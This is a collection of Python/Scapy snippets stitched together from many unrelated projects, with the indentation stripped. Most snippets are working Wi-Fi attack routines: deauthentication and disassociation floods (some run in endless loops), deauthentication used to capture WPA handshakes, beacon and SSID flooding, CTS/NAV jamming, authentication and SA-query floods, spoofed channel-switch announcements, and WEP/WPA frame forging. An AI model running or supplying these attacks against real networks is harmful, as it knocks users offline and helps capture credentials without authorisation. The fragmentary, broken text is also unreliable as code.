def shoot(self, tgt):
self.__c_TGT = tgt
sniffer_thread = threading.Thread(target=self.start_eapol_sniffer)
sniffer_thread.daemon = True
sniffer_thread.start()
while not self.__SNIFFER_STATUS:
time.sleep(1)
__pkt_to_cl = RadioTap() / Dot11(
addr1=tgt, addr2=self.bssid,
addr3=self.bssid) / Dot11Deauth(reason=7)
__pkt_to_ap = RadioTap() / Dot11(
addr1=self.bssid, addr2=tgt, addr3=tgt) / Dot11Deauth(reason=7)
for n in range(32 * 1):
sendp(__pkt_to_cl, iface=self.iface, count=1, verbose=False)
sendp(__pkt_to_ap, iface=self.iface, count=1, verbose=False)
while self.__SNIFFER_STATUS:
time.sleep(1)
self.__SNIFFER_STATUS = not bool(self.__SNIFFER_STATUS)
if self.verify_handshake(tgt):
return (True, self.__c_HANDSHAKE)
else:
return (False, [])
def close(self):
"""
Disassociate from the access point, This does not veify that
the AP received the message and should be considred a
best-effort attempt.
errDict = {
-1:"Not Connected",
0:"No Error"
}
"""
if not self.connected:
return -1
sendp(RadioTap() / Dot11(addr1=self.dest_mac,
addr2=self.source_mac,
addr3=self.bssid,
SC=self.__fixSC__(),
type=0,
subtype=12) / Dot11Disas(reason=3),
iface=self.interface,
verbose=False)
sendp(RadioTap() / Dot11(addr1=self.dest_mac,
addr2=self.source_mac,
addr3=self.bssid,
SC=self.__fixSC__(),
type=0,
subtype=12) / Dot11Disas(reason=3),
iface=self.interface,
verbose=False)
self.connected = False
return 0
def deBuilder(self, packet, stream, genFCS):
"""Return the decrypted packet"""
## Remove the FCS from the old packet body
postPkt = RadioTap(self.pt.byteRip(packet.copy(),
chop = True,
order = 'last',
output = 'str',
qty = 4))
## Remove RadioTap() info if required
if genFCS is False:
postPkt = RadioTap()/postPkt[RadioTap].payload
## Rip off the Dot11WEP layer
del postPkt[Dot11WEP]
## Add the stream to LLC
decodedPkt = postPkt/LLC(str(stream))
## Flip FCField bits accordingly
if decodedPkt[Dot11].FCfield == 65:
decodedPkt[Dot11].FCfield = 1
elif decodedPkt[Dot11].FCfield == 66:
decodedPkt[Dot11].FCfield = 2
## Return the decoded packet with or without FCS
if genFCS is False:
return decodedPkt
else:
return decodedPkt/Padding(load = binascii.unhexlify(self.pt.endSwap(hex(crc32(str(decodedPkt[Dot11])) & 0xffffffff)).replace('0x', '')))
def send_beacon_ex(essid,
interface,
privacy=PRIVACY_NONE,
bssid=None,
channel=6):
"""
Convenience function for sending beacons without a thread or creating an instance
"""
if not bssid:
bssid = getHwAddr(interface)
channel = chr(channel)
sequence = randint(1200, 2000)
if privacy in [PRIVACY_NONE, 'none', 'NONE']:
beacon = (
RadioTap() / Dot11(addr1="ff:ff:ff:ff:ff:ff",
addr2=bssid,
addr3=bssid,
SC=sequence) /
Dot11Beacon(cap='ESS+short-preamble+short-slot') /
Dot11Elt(ID="SSID", info=essid) /
Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24') /
Dot11Elt(ID="DSset", info=channel) /
Dot11Elt(ID=42, info="\x04") / Dot11Elt(ID=47, info="\x04") /
Dot11Elt(ID=50, info="\x0c\x12\x18\x60"))
elif privacy in [PRIVACY_WEP, 'wep', 'WEP']:
beacon = (
RadioTap() / Dot11(addr1="ff:ff:ff:ff:ff:ff",
addr2=bssid,
addr3=bssid,
SC=sequence) /
Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot') /
Dot11Elt(ID="SSID", info=essid) /
Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24') /
Dot11Elt(ID="DSset", info=channel) /
Dot11Elt(ID=42, info="\x04") / Dot11Elt(ID=47, info="\x04") /
Dot11Elt(ID=50, info="\x0c\x12\x18\x60"))
elif privacy in [PRIVACY_WPA, 'wpa', 'WPA']:
beacon = (
RadioTap() / Dot11(addr1="ff:ff:ff:ff:ff:ff",
addr2=bssid,
addr3=bssid,
SC=sequence) /
Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot') /
Dot11Elt(ID="SSID", info=essid) /
Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24') /
Dot11Elt(ID="DSset", info=channel) /
Dot11Elt(ID=221,
info="\x00\x50\xf2\x01\x01\x00" + "\x00\x50\xf2\x02" +
"\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" +
"\x00\x50\xf2\x01") / Dot11Elt(ID=42, info="\x00") /
Dot11Elt(ID=50, info="\x30\x48\x60\x6c") / Dot11Elt(
ID=221,
info=
"\x00\x50\xf2\x02\x01\x01\x84\x00\x03\xa4\x00\x00\x27\xa4\x00\x00\x42\x43\x5e\x00\x62\x32\x2f\x00"
))
else:
raise Exception('Invalid privacy setting')
sendp(beacon, iface=interface, verbose=False)
def deauth(self, e):
global SEQ_NUM
pkts = []
deauth_pkt1 = RadioTap() / Dot11(addr1=self.client_mac,
addr2=self.ap_mac,
addr3=self.ap_mac) / Dot11Deauth()
deauth_pkt2 = RadioTap() / Dot11(
addr1=self.ap_mac, addr2=self.client_mac,
addr3=self.client_mac) / Dot11Deauth()
'''
Channel Switch Announcement
+ Dot11
\x0d Action
+ Raw
\x00 Management
\x04 CSA
\x25 Element ID [37]
\x03 Length
\x00 Channel Switch Mode
\x04 New Channel Num
\x00 Channel Switch Count
'''
csa_pkt = RadioTap() / Dot11(
addr1=self.client_mac,
addr2=self.ap_mac,
addr3=self.ap_mac,
type=0,
subtype=0x0d) / Raw("\x00\x04\x25\x03\x00" +
chr(self.client_channel) + "\x00")
#csa_pkt = Jammer.append_csa(self.my_beacon, 56)
pkts.append(deauth_pkt1)
pkts.append(deauth_pkt2)
pkts.append(csa_pkt)
deauth_pkt1[RadioTap].notdecoded = deauth_pkt1[
RadioTap].notdecoded[:10] + channels[
self.ap_channel] + deauth_pkt1[RadioTap].notdecoded[12:]
deauth_pkt1[RadioTap].notdecoded = deauth_pkt1[
RadioTap].notdecoded[:10] + channels[
self.ap_channel] + deauth_pkt1[RadioTap].notdecoded[12:]
logger.log("Starting deauth on AP [G]" + self.ap_mac + "[/G] (" +
self.ap_ssid + ") and client [G]" + self.client_mac +
"[/G]...")
while not e.isSet():
for p in pkts:
SEQ_NUM += 1
p[RadioTap].SC = SEQ_NUM
p[Dot11].FCfield |= 0x20
sendp(p, iface=self.iface_ap, inter=0.1 / len(pkts))
logger.log("Deauth [G]stopped[/G]")
def forge_ap_cl(self):
_pkt_ap = RadioTap() / Dot11(addr1=self.cl,
addr2=self.ap,
addr3=self.ap) / Dot11Deauth(reason=7)
_pkt_cl = RadioTap() / Dot11(addr1=self.ap,
addr2=self.cl,
addr3=self.cl) / Dot11Deauth(reason=7)
if self.unlimited:
while True:
self.flood_ap_cl(_pkt_ap, _pkt_cl)
else:
for _count in range(0, self.count):
self.flood_ap_cl(_pkt_ap, _pkt_cl)
def perform_deauth(router, client, iface):
pckt = RadioTap() / Dot11(addr1=client, addr2=router, addr3=router) / Dot11Deauth(reason=4)
cli_to_ap_pckt = RadioTap() / Dot11(addr1=router, addr2=client, addr3=client) / Dot11Deauth(reason=7)
print('Sending Deauth to ' + client + ' from ' + router)
try:
for i in range(100):
sendp(pckt, inter=0.1, count=1, loop=0, iface=iface, verbose=0)
sendp(cli_to_ap_pckt, inter=0.1, count=1, loop=0, iface=iface, verbose=0)
print("\U0001F608")
except Exception as e:
print(f"error: {e}")
def start():
ap = args.bssid
client = args.client
pkt = RadioTap()/Dot11(addr1=client, addr2=ap, addr3=ap)/Dot11Deauth()
pkt1 = RadioTap()/Dot11(addr1=ap, addr2=client, addr3=client)/Dot11Deauth()
for n in range(int(args.number)):
sendp(pkt, iface=args.iface, verbose=0)
print("Send deauth packet: " + termcolor(ap, "green") + " (ap) > " + termcolor(client, "blue") + " (client) via " +
termcolor(args.iface, "red") + " #" + str(n + 1))
sleep(0.5)
sendp(pkt1, iface=args.iface, verbose=0)
print("Send deauth packet: " + termcolor(client, "blue") + " (client) > " + termcolor(ap, "green") + " (ap) via " +
termcolor(args.iface, "red") + " #" + str(n + 1))
def shoot(self, _sn, _rc):
_pkt_ap_to_cl = RadioTap() / Dot11(addr1=_rc, addr2=_sn,
addr3=_sn) / Dot11Deauth(reason=7)
_pkt_cl_to_ap = RadioTap() / Dot11(addr1=_sn, addr2=_rc,
addr3=_rc) / Dot11Deauth(reason=7)
sendp(_pkt_ap_to_cl,
iface=self.iface,
count=self.deauth,
verbose=False)
sendp(_pkt_cl_to_ap,
iface=self.iface,
count=self.deauth,
verbose=False)
time.sleep(0.80)
def sa_query_attack(interface, ap, sta):
pkt = RadioTap() / Dot11(addr1=ap.bssid, addr2=sta.mac_addr, addr3=ap.bssid) / \
Dot11Auth(algo=0, seqnum=0x0001, status=0x0000)
interface.inject(pkt)
pkt = RadioTap() / Dot11(addr1=ap.bssid, addr2=sta.mac_addr, addr3=ap.bssid) / \
Dot11AssoReq(cap=0x3104, listen_interval=0x0001) / Dot11Elt(ID=0, info="Wireless Attack Testbed") / \
Dot11EltRates() / Dot11Elt(ID='RSNinfo', info=(
'\x01\x00' # RSN Version 1
'\x00\x0f\xac\x04' # Group Cipher Suite : 00-0f-ac CCMP
'\x01\x00' # 2 Pairwise Cipher Suite (next line)
'\x00\x0f\xac\x04' # AES Cipher
'\x01\x00' # 1 Authentication Key Managment Suite (line below)
'\x00\x0f\xac\x02' # Pre-Shared Key
'\x80\x00')) # Supports MFP
interface.inject(pkt)
def setPrivacy(self, value):
"""
Configure the privacy settings for None, WEP, and WPA
"""
if value == PRIVACY_NONE:
self.probe_response_template = RadioTap() / Dot11(
addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid,
addr3=self.bssid) / Dot11ProbeResp(
cap='ESS+privacy+short-preamble+short-slot') / Dot11Elt(
ID="SSID", info='') / Dot11Elt(
ID="Rates",
info='\x82\x84\x8b\x96\x0c\x12\x18\x24'
) / Dot11Elt(ID="DSset", info=self.channel) / Dot11Elt(
ID=42, info="\x04") / Dot11Elt(
ID=47, info="\x04") / Dot11Elt(
ID=50, info="\x0c\x12\x18\x60")
elif value == PRIVACY_WEP:
self.probe_response_template = RadioTap() / Dot11(
addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid
) / Dot11ProbeResp(cap='ESS+short-preamble+short-slot') / Dot11Elt(
ID="SSID", info='') / Dot11Elt(
ID="Rates",
info='\x82\x84\x8b\x96\x0c\x12\x18\x24') / Dot11Elt(
ID="DSset", info=self.channel) / Dot11Elt(
ID=42, info="\x04") / Dot11Elt(
ID=47, info="\x04") / Dot11Elt(
ID=50, info="\x0c\x12\x18\x60")
elif value == PRIVACY_WPA:
self.probe_response_template = RadioTap() / Dot11(
addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid
) / Dot11ProbeResp(
cap='ESS+privacy+short-preamble+short-slot'
) / Dot11Elt(ID="SSID", info='') / Dot11Elt(
ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24'
) / Dot11Elt(ID="DSset", info=self.channel) / Dot11Elt(
ID=221,
info="\x00\x50\xf2\x01\x01\x00" + "\x00\x50\xf2\x02" +
"\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" +
"\x00\x50\xf2\x01"
) / Dot11Elt(
ID=42, info="\x00"
) / Dot11Elt(
ID=50, info="\x30\x48\x60\x6c"
) / Dot11Elt(
ID=221,
info=
"\x00\x50\xf2\x02\x01\x01\x84\x00\x03\xa4\x00\x00\x27\xa4\x00\x00\x42\x43\x5e\x00\x62\x32\x2f\x00"
)
def test_new_packet(self):
"""
Tests the 'new_packet' method.
"""
config = Config()
new_packets = Queue()
sniffer = PacketSniffer(config, new_packets)
self.assertEqual(sniffer.new_packets.qsize(), 0)
packet = RadioTap() \
/ Dot11(
addr1="ff:ff:ff:ff:ff:ff",
addr2="aa:bb:cc:11:22:33",
addr3="dd:ee:ff:11:22:33"
) \
/ Dot11ProbeReq() \
/ Dot11Elt(
info="Test"
)
sniffer.new_packet(packet)
self.assertEqual(sniffer.new_packets.qsize(), 1)
ProbeRequestParser.parse(sniffer.new_packets.get(timeout=1))
def pp_deauth(blacklist):
"""
Starts deauthentication attack for PineAP Suite.
"""
os.system("reset")
print "\033[1m" + banner_dos
print colored(
"\n------------------- ̿' ̿'\̵͇̿̿\з=(◕_◕)=ε/̵͇̿̿/'̿'̿ ---------------------\n̿",
"red")
print "\033[1m[--] TARGET(s): ", blacklist
time.sleep(1)
print "\033[1m[*] Deauthing PineAP client devices"
time.sleep(2)
print "\033[1m[*] Channel number being set\n"
time.sleep(2)
for d in blacklist:
clist = sniff(iface=iface, count=30)
channel = find_channel(clist, d)
os.system("iwconfig wlan1mon channel " + str(channel))
print "\033[1m[*] Sending 120 deauthentication packets to ", d
deauth = RadioTap() / Dot11(addr1="ff:ff:ff:ff:ff:ff",
addr2=d.lower(),
addr3=d.lower()) / Dot11Deauth()
sendp(deauth, iface=iface, count=120, inter=.2, verbose=False)
time.sleep(1)
print "\033[1m[*] Attack completed"
time.sleep(2)
def asso_frame_blueprint(self, ap, cl):
capibility = self.beacon.sprintf("{Dot11Beacon:%Dot11Beacon.cap%}")
efields = self.enumerate_asso_fields(self.beacon)
return RadioTap() / Dot11(addr1=ap, addr2=cl, addr3=ap) / Dot11AssoReq(cap=capibility, listen_interval=3) / \
Dot11Elt(ID=efields[0]['ID'], len=efields[0]['len'], info=efields[0]['info']) / \
Dot11Elt(ID=efields[1]['ID'], len=efields[1]['len'], info=efields[1]['info']) / \
Dot11Elt(ID=efields[48]['ID'], len=efields[48]['len'], info=efields[48]['info'])
def getRSNInformation(self, essid):
sendp(RadioTap() / Dot11(addr1=self.bssid,
addr2=self.source_mac,
addr3=self.bssid,
SC=self.__unfuckupSC__(),
subtype=4) / Dot11ProbeReq() /
Dot11Elt(ID=0, info=essid) /
Dot11Elt(ID=1, info='\x82\x84\x0b\x16\x24\x30\x48\x6c') /
Dot11Elt(ID=50, info='\x0c\x12\x18\x60'),
iface=self.interface,
verbose=False)
self.sequence += 1
sniff(iface=self.interface,
store=0,
timeout=self.timeout,
stop_filter=self.__stopfilter__)
if self.lastpacket == None or not self.lastpacket.haslayer(
'Dot11ProbeResp'):
return None
probeResp = self.lastpacket.getlayer(Dot11ProbeResp)
tmp = probeResp.getlayer(Dot11Elt)
while tmp:
if tmp.fields.get('ID') == 48:
rsnInfo = tmp
break
else:
tmp = tmp.payload
if rsnInfo == None:
rsnInfo = '' # we didn't find it in the probe response, so we'll return an empty string
else:
rsnInfo = parseRSNData(rsnInfo.info)
rsnInfo = buildRSNData(rsnInfo)
rsnInfo = '\x30' + chr(len(rsnInfo)) + rsnInfo
return rsnInfo
def cts_nav_attack(interface):
# http://matej.sustr.sk/publ/articles/cts-dos/cts-dos.en.html
# pkt = RadioTap(len=18, present='Flags+Rate+Channel+dBm_AntSignal+Antenna',
pkt = RadioTap() / Dot11(type=1, subtype=12, ID=0xff7f, addr1="00:00:de:ad:be:ef")
while True:
interface.inject(pkt)
sleep(0.01)
def trigger_channel_switch_in_device(self, iface, sta_mac_addr,
target_channel, serving_channel,
**kwargs):
"""
Transmit Channel Switch Announcement
(CSA) beacon to the given STA.
"""
bssid = kwargs.get('bssid')
self.log.debug(
'Sending CSA to {} on iface {}'.format(sta_mac_addr, iface),
' with BSSID {} switch STA to channel {}'.format(
bssid, str(target_channel)))
# tbd: clean up this mess
data1 = ('3bc0904f0000000064000100000542494741500',
'1088c129824b048606c0301')
data2 = ('050400020000070c44452024081464051a84031a2d1a0c001bffff',
'0000000000000000000001000000000000000000003d162c000400',
'0000000000000000000000000000000000007f0800000000000000',
'40dd180050f2020101800003a4000027a4000042435d0062322e00',
'dd06aaaaaa3f4325dd14aaaaaa8020544b4e2d4c6f57532d537973',
'74656ddd06aaaaaa215a01250300')
beacon = (RadioTap() / Dot11(
type=0, subtype=8, addr1=sta_mac_addr, addr2=bssid, addr3=bssid) /
binascii.unhexlify(
data1 + hex(serving_channel).replace("0x", "") + data2 +
hex(target_channel).replace("0x", "") + '00'))
# tbd: do we really need this
BEACON_ARQ = 3
for ii in range(BEACON_ARQ):
# repetitive transmission
sendp(beacon, iface=iface)
return True
def send_wpa_enc(self, data, iv, seqnum, dest, mic_key,
key_idx=0, additionnal_flag=["from-DS"],
encrypt_key=None):
"""Send an encrypted packet with content @data, using IV @iv,
sequence number @seqnum, MIC key @mic_key
"""
if encrypt_key is None:
encrypt_key = self.tk
rep = RadioTap()
rep /= Dot11(
addr1=dest,
addr2=self.mac,
addr3=self.mac,
FCfield="+".join(['wep'] + additionnal_flag),
SC=(next(self.seq_num) << 4),
subtype=0,
type="Data",
)
# Assume packet is send by our AP -> use self.mac as source
# Encapsule in TKIP with MIC Michael and ICV
data_to_enc = build_MIC_ICV(raw(data), mic_key, self.mac, dest)
# Header TKIP + payload
rep /= Raw(build_TKIP_payload(data_to_enc, iv, self.mac, encrypt_key))
self.send(rep)
return rep
def ssidFlood(ssid, senderMAC, channel): dot11 = Dot11(type=0, subtype=8, addr1="ff:ff:ff:ff:ff:ff", addr2=senderMAC, addr3=senderMAC) beacon = Dot11Beacon(cap="ESS+privacy") essid = Dot11Elt(ID="SSID", info=ssid, len=len(ssid)) echann = Dot11Elt(ID="DSset", info=chr(channel)) frame = RadioTap()/dot11/beacon/essid/echann sendp(frame, inter=0.1, iface=args.iface, verbose=False, loop=1)
def get_rsn_information(self, essid):
rsnInfo = None
sendp(RadioTap() / Dot11(addr1=self.bssid,
addr2=self.source_mac,
addr3=self.bssid,
SC=self.__fixSC__(),
subtype=4) / Dot11ProbeReq() /
Dot11Elt(ID=0, info=essid) /
Dot11Elt(ID=1, info='\x82\x84\x0b\x16\x24\x30\x48\x6c') /
Dot11Elt(ID=50, info='\x0c\x12\x18\x60'),
iface=self.interface,
verbose=False)
self.sequence += 1
sniff(iface=self.interface,
store=0,
timeout=self.timeout,
stop_filter=self.__stopfilter__)
if self.lastpacket is None or not self.lastpacket.haslayer(
Dot11ProbeResp):
return None
probeResp = self.lastpacket.getlayer(Dot11ProbeResp)
tmp = probeResp.getlayer(Dot11Elt)
while tmp:
if tmp.fields.get('ID') == 48:
rsnInfo = tmp
break
else:
tmp = tmp.payload
if rsnInfo is None:
rsnInfo = '' # Did not find rsnInfo in probe response.
else:
rsnInfo = build_rsn_data(parse_rsn_data(rsnInfo.info))
rsnInfo = '\x30' + chr(len(rsnInfo)) + rsnInfo
return rsnInfo
def search_n_destroy(iface: str):
setup_monitor(iface)
pkts_stream = sniff_gen(iface=iface)
for pkt in pkts_stream:
if UDP in pkt:
dgram = pkt[UDP]
if dgram.dport == 5555:
frame = (
RadioTap() / Dot11FCS(
subtype=8,
type="Data",
proto=0,
FCfield="to-DS",
addr1=pkt[Dot11].addr1,
addr2=pkt[Dot11].addr2,
addr3=pkt[Dot11].addr3,
) /
Dot11QoS(Reserved=0, Ack_Policy=0, EOSP=0, TID=0, TXOP=0) /
LLC(dsap=0xAA, ssap=0xAA, ctrl=3) /
SNAP(OUI=0x0, code="IPv4") / IP(version=4,
proto="udp",
src=pkt[IP].src,
dst=pkt[IP].dst) /
UDP(sport=6666, dport=5555) / Raw(load=bytes.fromhex(
"436d640001001200010404000a000000808080802020202010652f"
)))
sendp(frame, iface=iface)
break
def wpaEncrypt(encKey, origPkt, decodedPkt, PN, genFCS=True):
"""Encompasses the steps needed to encrypt a WPA packet
No structure for TKIP has been done as of yet
"""
## Increment the PN positively per IEEE spec
PN[5] += 1
## Grab the payload of the decoded packet
dEverything = decodedPkt[LLC]
## Remove the FCS from the original packet
newPkt = RadioTap((pt.byteRip(origPkt.copy(),
chop=True,
order='last',
output='str',
qty=4)))
del newPkt[Dot11WEP]
## The data is ready for encryption
newPkt = newPkt / dEverything
encodedPkt = ccmpCrypto.encryptCCMP(newPkt, encKey, PN, genFCS)
## Flip FCField bits accordingly
### DEBUG
# if encodedPkt[Dot11].FCfield == 1L:
# encodedPkt[Dot11].FCfield = 65L
# elif encodedPkt[Dot11].FCfield == 2L:
# encodedPkt[Dot11].FCfield = 66L
if encodedPkt[Dot11].FCfield == 1:
encodedPkt[Dot11].FCfield = 65
elif encodedPkt[Dot11].FCfield == 2:
encodedPkt[Dot11].FCfield = 66
return encodedPkt
def send_ctrl_msg(json_data: str,
my_mac: str,
mon_interface: str = 'mon0') -> None:
a = RadioTap() / Dot11(addr1="ff:ff:ff:ff:ff:ff",
addr2=my_mac,
addr3="ff:ff:ff:ff:ff:ff") / json_data
sendp(a, iface=mon_interface, verbose=0)
def get_radiotap_header(self):
radiotap_packet = RadioTap(
len=18,
present='Flags+Rate+Channel+dBm_AntSignal+Antenna',
notdecoded='\x00\x6c' + get_frequency(self.channel) +
'\xc0\x00\xc0\x01\x00\x00')
return radiotap_packet
def _read_cmds_from_pcap(stream):
for pkt in stream:
if isinstance(pkt, Raw):
pkt = RadioTap(pkt)
if UDP in pkt:
dgram = pkt[UDP]
if dgram.dport == 5555:
yield dgram
def auth_attack(interface, sta, ap):
pkt = RadioTap() / Dot11(addr1=ap.bssid, addr2=sta.mac_addr, addr3=ap.bssid) / \
Dot11Auth(algo=0, seqnum=0x0001, status=0x0000)
while True:
cprint("ZZZ", 'blue')
interface.inject(pkt)
pkt.SC += 1
sleep(0.3)
def __init__(self, interface, args):
self.interface = interface
self.args = args
## Create a header that works for encrypted wifi having FCS
### These bytes can be switched up, if memory serves, this is a channel 6 RadioTap()
rTap = '00 00 26 00 2f 40 00 a0 20 08 00 a0 20 08 00 00 20 c8 af c8 00 00 00 00 10 6c 85 09 c0 00 d3 00 00 00 d2 00 cd 01'
self.rTap = RadioTap(unhexlify(rTap.replace(' ', '')))
def run(self, args, cmd):
self.cmd = cmd
with db_session:
bss = cmd.select_bss(args.ssid, args.bssid, args.client)
if bss:
if not args.bssid:
args.bssid = bss.bssid
if args.channel is None:
args.channel = bss.channel
if args.bssid is None:
cmd.perror("BSSID is missing, and couldn't be obtained from the recon db.")
elif args.channel is None:
cmd.perror("Channel is missing, and couldn't be obtained from the recon db.")
else:
interface = set_monitor_mode(args.iface)
if args.channel > 0:
check_chset(interface, args.channel)
else:
args.channel = pyw.chget(interface)
deauth_frame = RadioTap() / Dot11(addr1=args.client, addr2=args.bssid, addr3=args.bssid) / Dot11Deauth(
reason="class3-from-nonass")
args.num_frames = "infinite" if args.num_frames <= 0 else args.num_frames * 64
if compare_macs(args.client, BROADCAST_MAC):
cmd.pfeedback(
"[i] Sending {} deauth frames to all clients from AP {} on channel {}...".format(args.num_frames,
args.bssid,
args.channel))
else:
cmd.pfeedback(
"[i] Sending {} deauth frames to client {} from AP {} on channel {}...".format(args.num_frames,
args.client,
args.bssid,
args.channel))
if args.num_frames == "infinite":
self.inf_running = True
prev_sig_handler = signal.signal(signal.SIGINT, self.sig_int_handler)
cmd.pfeedback("[i] Press ctrl-c to stop.")
while self.inf_running:
try:
sendp(deauth_frame, iface=args.iface, count=64, inter=0.002)
except:
pass
sleep(0.5)
signal.signal(signal.SIGINT, prev_sig_handler)
else:
sendp(deauth_frame, iface=args.iface, count=args.num_frames, inter=0.002)
def connect(self, essid, rsnInfo=''):
"""
Connect/Associate with an access point.
errDict = {
-1:"Already Connected",
0:"No Error",
1:"Failed To Get Probe Response",
2:"Failed To Get Authentication Response",
3:"Failed To Get Association Response",
4:"Authentication Request Received Fail Response",
5:"Association Request Received Fail Response"
}
"""
# Dot11 Probe Request (to get authentication information if applicable)
payload = (RadioTap() / Dot11(
addr1=self.dest_mac, addr2=self.source_mac, addr3=self.dest_mac) /
Dot11Auth(seqnum=1))
self.__thread_sendp__(payload)
if rsnInfo is None: # None explicitly means go get it, leave it '' to proceed with out it
rsnInfo = self.get_rsn_information(essid)
if self.lastpacket is None or not self.lastpacket.haslayer(Dot11Auth):
return 2
if self.lastpacket.getlayer(Dot11Auth).status != 0:
return 4
#Dot11 Association Request
payload = (RadioTap() / Dot11(addr1=self.bssid,
addr2=self.source_mac,
addr3=self.bssid,
SC=self.__fixSC__(),
subtype=0) /
Dot11AssoReq(cap='ESS+short-preamble+short-slot',
listen_interval=10) /
Dot11Elt(ID=0, info=essid) /
Dot11Elt(ID=1, info='\x82\x84\x0b\x16\x24\x30\x48\x6c') /
Dot11Elt(ID=50, info='\x0c\x12\x18\x60') / rsnInfo)
self.__thread_sendp__(payload)
if self.lastpacket is None or not self.lastpacket.haslayer(
Dot11AssoResp):
return 3
if self.lastpacket.getlayer(Dot11AssoResp).status != 0:
return 5
self.connected = True
self.sequence = 0
return 0
def disassociate(self):
# Forge the dot11 disassociation packet
dis_packet = RadioTap()/Dot11(type=0, subtype=12, addr1=self.target_mac, addr2=self.other_mac, addr3=self.other_mac)/Dot11Deauth(reason=self.reason)
# Loop to send the disassociation packets to the victim device
while True:
# Repeat every delay value seconds
time.sleep(self.delay)
print("["+str(datetime.now().time())+"][+] Disassociation frames (reason "+str(self.reason)+") sent to target "+self.target_mac+" as sender endpoint "+self.other_mac)
sendp(dis_packet, iface=self.interface, count=self.num, verbose=False)
